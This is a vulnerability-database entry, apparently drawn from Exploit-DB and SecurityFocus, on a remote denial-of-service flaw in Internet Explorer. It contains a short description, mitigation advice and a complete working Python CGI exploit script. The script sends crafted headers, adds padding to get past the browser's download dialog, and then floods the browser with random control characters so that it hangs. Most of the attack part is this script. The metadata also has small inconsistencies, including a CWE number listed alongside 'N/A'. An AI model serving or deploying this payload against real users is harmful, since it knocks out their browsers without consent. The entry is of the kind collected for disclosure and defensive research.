Microsoft Internet Explorer Remote Denial-of-Service Vulnerability

vendor:

Internet Explorer

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Denial-of-Service

400

CWE

Product Name: Internet Explorer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Microsoft Internet Explorer Remote Denial-of-Service Vulnerability

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability. Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. The exploit code sends a large file with random characters to the browser, causing it to hang.

Mitigation:

Users should avoid visiting untrusted websites and should keep their browser and system up-to-date with the latest security patches.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34478/info

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. 

#/usr/bin/env python
import sys
import random

CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]

def send_file():
      l = 800000 + 4096
      print "Content-Type: text/plain"
      print "Content-Length: %d" % l
      print "Cache-Control: no-cache, no-store, must-revalidate"
      # this is not standardized, but use it anyway
      print "Pragma: no-cache"
      print ""
      # bypass IE download dialog
      sys.stdout.write("a" * 4096)
      # print junks
      for i in xrange(l):
              sys.stdout.write(random.choice(CHAR_SET))
      sys.exit()

send_file()